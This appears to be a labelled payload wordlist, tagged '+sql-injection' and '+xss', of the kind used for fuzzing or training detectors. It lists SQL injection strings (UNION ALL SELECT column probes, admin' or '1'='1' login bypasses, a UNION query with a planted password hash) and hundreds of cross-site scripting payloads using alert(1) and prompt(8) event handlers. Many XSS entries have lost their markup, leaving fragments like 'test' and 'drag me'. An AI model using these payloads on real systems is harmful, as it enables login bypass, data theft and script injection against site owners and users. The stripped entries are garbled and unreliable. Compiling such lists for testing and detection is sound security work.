'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX'--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX'#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#' +sql-injection,''-'' +sql-injection,'' '' +sql-injection,''&'' +sql-injection,''^'' +sql-injection,''*'' +sql-injection,'' or ''-'' +sql-injection,'' or '' '' +sql-injection,'' or ''&'' +sql-injection,'' or ''^'' +sql-injection,'' or ''*'' +sql-injection,'"-"' +sql-injection,'" "' +sql-injection,'"&"' +sql-injection,'"^"' +sql-injection,'"*"' +sql-injection,'" or ""-"' +sql-injection,'" or "" "' +sql-injection,'" or ""&"' +sql-injection,'" or ""^"' +sql-injection,'" or ""*"' +sql-injection,'or true--' +sql-injection,'" or true--' +sql-injection,'' or true--' +sql-injection,'") or true--' +sql-injection,'') or true--' +sql-injection,'' or 'x'='x' +sql-injection,'') or ('x')=('x' +sql-injection,'')) or (('x'))=(('x' +sql-injection,'" or "x"="x' +sql-injection,'") or ("x")=("x' +sql-injection,'")) or (("x"))=(("x' +sql-injection,'or 1=1' +sql-injection,'or 1=1--' +sql-injection,'or 1=1#' +sql-injection,'or 1=1/*' +sql-injection,'admin' --' +sql-injection,'admin' #' +sql-injection,'admin'/*' +sql-injection,'admin' or '1'='1' +sql-injection,'admin' or '1'='1'--' +sql-injection,'admin' or '1'='1'#' +sql-injection,'admin' or '1'='1'/*' +sql-injection,'admin'or 1=1 or ''='' +sql-injection,'admin' or 1=1' +sql-injection,'admin' or 1=1--' +sql-injection,'admin' or 1=1#' +sql-injection,'admin' or 1=1/*' +sql-injection,'admin') or ('1'='1' +sql-injection,'admin') or ('1'='1'--' +sql-injection,'admin') or ('1'='1'#' +sql-injection,'admin') or ('1'='1'/*' +sql-injection,'admin') or '1'='1' +sql-injection,'admin') or '1'='1'--' +sql-injection,'admin') or '1'='1'#' +sql-injection,'admin') or '1'='1'/*' +sql-injection,'1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055' +sql-injection,'admin" --' +sql-injection,'admin" #' +sql-injection,'admin"/*' +sql-injection,'admin" or "1"="1' +sql-injection,'admin" or "1"="1"--' +sql-injection,'admin" or "1"="1"#' +sql-injection,'admin" or "1"="1"/*' +sql-injection,'admin"or 1=1 or ""="' +sql-injection,'admin" or 1=1' +sql-injection,'admin" or 1=1--' +sql-injection,'admin" or 1=1#' +sql-injection,'admin" or 1=1/*' +sql-injection,'admin") or ("1"="1' +sql-injection,'admin") or ("1"="1"--' +sql-injection,'admin") or ("1"="1"#' +sql-injection,'admin") or ("1"="1"/*' +sql-injection,'admin") or "1"="1' +sql-injection,'admin") or "1"="1"--' +sql-injection,'admin") or "1"="1"#' +sql-injection,'admin") or "1"="1"/*' +sql-injection,'1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055' +sql-injection,'' +xss,'"-prompt(8)-"' +xss,''-prompt(8)-'' +xss,'";a=prompt,a()//' +xss,'';a=prompt,a()//' +xss,''-eval("window['pro'%2B'mpt'](8)")-'' +xss,'"-eval("window['pro'%2B'mpt'](8)")-"' +xss,'"onclick=prompt(8)>"@x.y' +xss,'"onclick=prompt(8)>"@x.y' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'t>' +xss,'' +xss,'">' +xss,'lose focus!' +xss,'click this!' +xss,'copy this!' +xss,'right click this!' +xss,'copy this!' +xss,'double click this!' +xss,'drag this!' +xss,'focus this!' +xss,'input here!' +xss,'press any key!' +xss,'press any key!' +xss,'press any key!' +xss,'click this!' +xss,'hover this!' +xss,'hover this!' +xss,'hover this!' +xss,'click this!' +xss,'paste here!' +xss,'' +xss,'click' +xss,'click' +xss,'
' +xss,'">.gif' +xss,'' +xss,'GIF89a/**/=alert(document.domain)//;' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'
test
' +xss,'
test
' +xss,'
test
' +xss,'
test
' +xss,'
test
' +xss,'
' +xss,'
' +xss,'
' +xss,'
' +xss,'
' +xss,'
' +xss,'
test
' +xss,'
test
' +xss,'
test
' +xss,'
' +xss,'
test
' +xss,'
test
' +xss,'
test
' +xss,'
test
' +xss,'
test
' +xss,'
' +xss,'
test
' +xss,'
test
' +xss,'
test
' +xss,'
test
' +xss,'
test
' +xss,'
test
' +xss,'
test
' +xss,'
test
' +xss,'
test
' +xss,'
test
' +xss,'
test
' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'' +xss,'test' +xss,'test' +xss,'test' +xss,'' +xss,'' +xss,'' +xss,'
drag me
' +xss,'
drag me
drop here' +xss,'
drag me
drop here' +xss,'
drag me
drop here' +xss,'
drag me
drop here' +xss,'
drag me
drop here' +xss,'
drag me
drop here' +xss,'
drag me
drop here' +xss,'
drag me
drop here' +xss,'
drag me
drop here' +xss,'
drag me
drop here' +xss,'
drag me
drop here' +xss,'
drag me
drop here' +xss,'
drag me
drop here' +xss,'
drag me
drop here' +xss,'
drag me
' +xss,'
drag me
' +xss,'
drag me
drop here' +xss,'
drag me
drop here' +xss,'
drag me
  • drop here
  • ' +xss,'
    drag me
  • drop here
  • ' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here
    ' +xss,'
    drag me
    drop here
    ' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    ' +xss,'
    drag me
    ' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    ' +xss,'
    drag me
    ' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
      drop here
    ' +xss,'
    drag me
      drop here
    ' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    ' +xss,'
    drag me
    ' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me

    drop here

    ' +xss,'
    drag me

    drop here

    ' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here' +xss,'
    drag me
    drop here</plaintext>' +xss,'<div draggable="true" contenteditable>drag me</div><plaintext ondrop=alert(1) contenteditable>drop here</plaintext>' +xss,'<div draggable="true" contenteditable>drag me</div><pre ondragover=alert(1) contenteditable>drop here</pre>' +xss,'<div draggable="true" contenteditable>drag me</div><pre ondrop=alert(1) contenteditable>drop here</pre>' +xss,'<div draggable="true" contenteditable>drag me</div><progress ondragover=alert(1) contenteditable>drop here</progress>' +xss,'<div draggable="true" contenteditable>drag me</div><progress ondrop=alert(1) contenteditable>drop here</progress>' +xss,'<div draggable="true" contenteditable>drag me</div><q ondragover=alert(1) contenteditable>drop here</q>' +xss,'<div draggable="true" contenteditable>drag me</div><q ondrop=alert(1) contenteditable>drop here</q>' +xss,'<div draggable="true" contenteditable>drag me</div><rb ondragover=alert(1) contenteditable>drop here</rb>' +xss,'<div draggable="true" contenteditable>drag me</div><rb ondrop=alert(1) contenteditable>drop here</rb>' +xss,'<div draggable="true" contenteditable>drag me</div><rp ondragover=alert(1) contenteditable>drop here</rp>' +xss,'<div draggable="true" contenteditable>drag me</div><rp ondrop=alert(1) contenteditable>drop here</rp>' +xss,'<div draggable="true" contenteditable>drag me</div><rt ondragover=alert(1) contenteditable>drop here</rt>' +xss,'<div draggable="true" contenteditable>drag me</div><rt ondrop=alert(1) contenteditable>drop here</rt>' +xss,'<div draggable="true" contenteditable>drag me</div><rtc ondragover=alert(1) contenteditable>drop here</rtc>' +xss,'<div draggable="true" contenteditable>drag me</div><rtc ondrop=alert(1) contenteditable>drop here</rtc>' +xss,'<div draggable="true" contenteditable>drag me</div><ruby ondragover=alert(1) contenteditable>drop here</ruby>' +xss,'<div draggable="true" contenteditable>drag me</div><ruby ondrop=alert(1) contenteditable>drop here</ruby>' +xss,'<div draggable="true" contenteditable>drag me</div><s ondragover=alert(1) contenteditable>drop here</s>' +xss,'<div draggable="true" contenteditable>drag me</div><s ondrop=alert(1) contenteditable>drop here</s>' +xss,'<div draggable="true" contenteditable>drag me</div><samp ondragover=alert(1) contenteditable>drop here</samp>' +xss,'<div draggable="true" contenteditable>drag me</div><samp ondrop=alert(1) contenteditable>drop here</samp>' +xss,'<div draggable="true" contenteditable>drag me</div><script ondragover=alert(1) contenteditable>drop here</script>' +xss,'<div draggable="true" contenteditable>drag me</div><script ondrop=alert(1) contenteditable>drop here</script>' +xss,'<div draggable="true" contenteditable>drag me</div><section ondragover=alert(1) contenteditable>drop here</section>' +xss,'<div draggable="true" contenteditable>drag me</div><section ondrop=alert(1) contenteditable>drop here</section>' +xss,'<div draggable="true" contenteditable>drag me</div><select ondragover=alert(1) contenteditable>drop here</select>' +xss,'<div draggable="true" contenteditable>drag me</div><select ondrop=alert(1) contenteditable>drop here</select>' +xss,'<div draggable="true" contenteditable>drag me</div><shadow ondragover=alert(1) contenteditable>drop here</shadow>' +xss,'<div draggable="true" contenteditable>drag me</div><shadow ondrop=alert(1) contenteditable>drop here</shadow>' +xss,'<div draggable="true" contenteditable>drag me</div><slot ondragover=alert(1) contenteditable>drop here</slot>' +xss,'<div draggable="true" contenteditable>drag me</div><slot ondrop=alert(1) contenteditable>drop here</slot>' +xss,'<div draggable="true" contenteditable>drag me</div><small ondragover=alert(1) contenteditable>drop here</small>' +xss,'<div draggable="true" contenteditable>drag me</div><small ondrop=alert(1) contenteditable>drop here</small>' +xss,'<div draggable="true" contenteditable>drag me</div><source ondragover=alert(1) contenteditable>drop here</source>' +xss,'<div draggable="true" contenteditable>drag me</div><source ondrop=alert(1) contenteditable>drop here</source>' +xss,'<div draggable="true" contenteditable>drag me</div><spacer ondragover=alert(1) contenteditable>drop here</spacer>' +xss,'<div draggable="true" contenteditable>drag me</div><spacer ondrop=alert(1) contenteditable>drop here</spacer>' +xss,'<div draggable="true" contenteditable>drag me</div><span ondragover=alert(1) contenteditable>drop here</span>' +xss,'<div draggable="true" contenteditable>drag me</div><span ondrop=alert(1) contenteditable>drop here</span>' +xss,'<div draggable="true" contenteditable>drag me</div><strike ondragover=alert(1) contenteditable>drop here</strike>' +xss,'<div draggable="true" contenteditable>drag me</div><strike ondrop=alert(1) contenteditable>drop here</strike>' +xss,'<div draggable="true" contenteditable>drag me</div><strong ondragover=alert(1) contenteditable>drop here</strong>' +xss,'<div draggable="true" contenteditable>drag me</div><strong ondrop=alert(1) contenteditable>drop here</strong>' +xss,'<div draggable="true" contenteditable>drag me</div><style ondragover=alert(1) contenteditable>drop here</style>' +xss,'<div draggable="true" contenteditable>drag me</div><style ondrop=alert(1) contenteditable>drop here</style>' +xss,'<div draggable="true" contenteditable>drag me</div><sub ondragover=alert(1) contenteditable>drop here</sub>' +xss,'<div draggable="true" contenteditable>drag me</div><sub ondrop=alert(1) contenteditable>drop here</sub>' +xss,'<div draggable="true" contenteditable>drag me</div><summary ondragover=alert(1) contenteditable>drop here</summary>' +xss,'<div draggable="true" contenteditable>drag me</div><summary ondrop=alert(1) contenteditable>drop here</summary>' +xss,'<div draggable="true" contenteditable>drag me</div><sup ondragover=alert(1) contenteditable>drop here</sup>' +xss,'<div draggable="true" contenteditable>drag me</div><sup ondrop=alert(1) contenteditable>drop here</sup>' +xss,'<div draggable="true" contenteditable>drag me</div><svg ondragover=alert(1) contenteditable>drop here</svg>' +xss,'<div draggable="true" contenteditable>drag me</div><svg ondrop=alert(1) contenteditable>drop here</svg>' +xss,'<div draggable="true" contenteditable>drag me</div><table ondragover=alert(1) contenteditable>drop here</table>' +xss,'<div draggable="true" contenteditable>drag me</div><table ondrop=alert(1) contenteditable>drop here</table>' +xss,'<div draggable="true" contenteditable>drag me</div><tbody ondragover=alert(1) contenteditable>drop here</tbody>' +xss,'<div draggable="true" contenteditable>drag me</div><tbody ondrop=alert(1) contenteditable>drop here</tbody>' +xss,'<div draggable="true" contenteditable>drag me</div><td ondragover=alert(1) contenteditable>drop here</td>' +xss,'<div draggable="true" contenteditable>drag me</div><td ondrop=alert(1) contenteditable>drop here</td>' +xss,'<div draggable="true" contenteditable>drag me</div><template ondragover=alert(1) contenteditable>drop here</template>' +xss,'<div draggable="true" contenteditable>drag me</div><template ondrop=alert(1) contenteditable>drop here</template>' +xss,'<div draggable="true" contenteditable>drag me</div><textarea ondragover=alert(1) contenteditable>drop here</textarea>' +xss,'<div draggable="true" contenteditable>drag me</div><textarea ondrop=alert(1) contenteditable>drop here</textarea>' +xss,'<div draggable="true" contenteditable>drag me</div><tfoot ondragover=alert(1) contenteditable>drop here</tfoot>' +xss,'<div draggable="true" contenteditable>drag me</div><tfoot ondrop=alert(1) contenteditable>drop here</tfoot>' +xss,'<div draggable="true" contenteditable>drag me</div><th ondragover=alert(1) contenteditable>drop here</th>' +xss,'<div draggable="true" contenteditable>drag me</div><th ondrop=alert(1) contenteditable>drop here</th>' +xss,'<div draggable="true" contenteditable>drag me</div><thead ondragover=alert(1) contenteditable>drop here</thead>' +xss,'<div draggable="true" contenteditable>drag me</div><thead ondrop=alert(1) contenteditable>drop here</thead>' +xss,'<div draggable="true" contenteditable>drag me</div><time ondragover=alert(1) contenteditable>drop here</time>' +xss,'<div draggable="true" contenteditable>drag me</div><time ondrop=alert(1) contenteditable>drop here</time>' +xss,'<div draggable="true" contenteditable>drag me</div><title ondragover=alert(1) contenteditable>drop here</title>' +xss,'<div draggable="true" contenteditable>drag me</div><title ondrop=alert(1) contenteditable>drop here</title>' +xss,'<div draggable="true" contenteditable>drag me</div><tr ondragover=alert(1) contenteditable>drop here</tr>' +xss,'<div draggable="true" contenteditable>drag me</div><tr ondrop=alert(1) contenteditable>drop here</tr>' +xss,'<div draggable="true" contenteditable>drag me</div><track ondragover=alert(1) contenteditable>drop here</track>' +xss,'<div draggable="true" contenteditable>drag me</div><track ondrop=alert(1) contenteditable>drop here</track>' +xss,'<div draggable="true" contenteditable>drag me</div><tt ondragover=alert(1) contenteditable>drop here</tt>' +xss,'<div draggable="true" contenteditable>drag me</div><tt ondrop=alert(1) contenteditable>drop here</tt>' +xss,'<div draggable="true" contenteditable>drag me</div><u ondragover=alert(1) contenteditable>drop here</u>' +xss,'<div draggable="true" contenteditable>drag me</div><u ondrop=alert(1) contenteditable>drop here</u>' +xss,'<div draggable="true" contenteditable>drag me</div><ul ondragover=alert(1) contenteditable>drop here</ul>' +xss,'<div draggable="true" contenteditable>drag me</div><ul ondrop=alert(1) contenteditable>drop here</ul>' +xss,'<div draggable="true" contenteditable>drag me</div><var ondragover=alert(1) contenteditable>drop here</var>' +xss,'<div draggable="true" contenteditable>drag me</div><var ondrop=alert(1) contenteditable>drop here</var>' +xss,'<div draggable="true" contenteditable>drag me</div><video ondragover=alert(1) contenteditable>drop here</video>' +xss,'<div draggable="true" contenteditable>drag me</div><video ondrop=alert(1) contenteditable>drop here</video>' +xss,'<div draggable="true" contenteditable>drag me</div><wbr ondragover=alert(1) contenteditable>drop here</wbr>' +xss,'<div draggable="true" contenteditable>drag me</div><wbr ondrop=alert(1) contenteditable>drop here</wbr>' +xss,'<div draggable="true" contenteditable>drag me</div><xmp ondragover=alert(1) contenteditable>drop here</xmp>' +xss,'<div draggable="true" contenteditable>drag me</div><xmp ondrop=alert(1) contenteditable>drop here</xmp>' +xss,'<div draggable="true" ondrag="alert(1)">test</div>' +xss,'<div draggable="true" ondragend="alert(1)">test</div>' +xss,'<div draggable="true" ondragenter="alert(1)">test</div>' +xss,'<div draggable="true" ondragleave="alert(1)">test</div>' +xss,'<div draggable="true" ondragstart="alert(1)">test</div>' +xss,'<div id=x tabindex=1 onactivate=alert(1)></div>' +xss,'<div id=x tabindex=1 onbeforeactivate=alert(1)></div>' +xss,'<div id=x tabindex=1 onbeforedeactivate=alert(1)></div><input autofocus>' +xss,'<div id=x tabindex=1 ondeactivate=alert(1)></div><input id=y autofocus>' +xss,'<div id=x tabindex=1 onfocus=alert(1)></div>' +xss,'<div id=x tabindex=1 onfocusin=alert(1)></div>' +xss,'<div onbeforecopy="alert(1)" contenteditable>test</div>' +xss,'<div onbeforecut="alert(1)" contenteditable>test</div>' +xss,'<div onbeforepaste="alert(1)" contenteditable>test</div>' +xss,'<div onblur=alert(1) tabindex=1 id=x></div><input autofocus>' +xss,'<div onclick="alert(1)">test</div>' +xss,'<div oncontextmenu="alert(1)">test</div>' +xss,'<div oncopy="alert(1)" contenteditable>test</div>' +xss,'<div oncut="alert(1)" contenteditable>test</div>' +xss,'<div ondblclick="alert(1)">test</div>' +xss,'<div onfocusout=alert(1) tabindex=1 id=x></div><input autofocus>' +xss,'<div onkeydown="alert(1)" contenteditable>test</div>' +xss,'<div onkeypress="alert(1)" contenteditable>test</div>' +xss,'<div onkeyup="alert(1)" contenteditable>test</div>' +xss,'<div onmousedown="alert(1)">test</div>' +xss,'<div onmouseenter="alert(1)">test</div>' +xss,'<div onmouseleave="alert(1)">test</div>' +xss,'<div onmousemove="alert(1)">test</div>' +xss,'<div onmouseout="alert(1)">test</div>' +xss,'<div onmouseover="alert(1)">test</div>' +xss,'<div onmouseup="alert(1)">test</div>' +xss,'<div onpaste="alert(1)" contenteditable>test</div>' +xss,'<dl draggable="true" ondrag="alert(1)">test</dl>' +xss,'<dl draggable="true" ondragend="alert(1)">test</dl>' +xss,'<dl draggable="true" ondragenter="alert(1)">test</dl>' +xss,'<dl draggable="true" ondragleave="alert(1)">test</dl>' +xss,'<dl draggable="true" ondragstart="alert(1)">test</dl>' +xss,'<dl id=x tabindex=1 onactivate=alert(1)></dl>' +xss,'<dl id=x tabindex=1 onbeforeactivate=alert(1)></dl>' +xss,'<dl id=x tabindex=1 onbeforedeactivate=alert(1)></dl><input autofocus>' +xss,'<dl id=x tabindex=1 ondeactivate=alert(1)></dl><input id=y autofocus>' +xss,'<dl id=x tabindex=1 onfocus=alert(1)></dl>' +xss,'<dl id=x tabindex=1 onfocusin=alert(1)></dl>' +xss,'<dl onbeforecopy="alert(1)" contenteditable>test</dl>' +xss,'<dl onbeforecut="alert(1)" contenteditable>test</dl>' +xss,'<dl onbeforepaste="alert(1)" contenteditable>test</dl>' +xss,'<dl onblur=alert(1) tabindex=1 id=x></dl><input autofocus>' +xss,'<dl onclick="alert(1)">test</dl>' +xss,'<dl oncontextmenu="alert(1)">test</dl>' +xss,'<dl oncopy="alert(1)" contenteditable>test</dl>' +xss,'<dl oncut="alert(1)" contenteditable>test</dl>' +xss,'<dl ondblclick="alert(1)">test</dl>' +xss,'<dl onfocusout=alert(1) 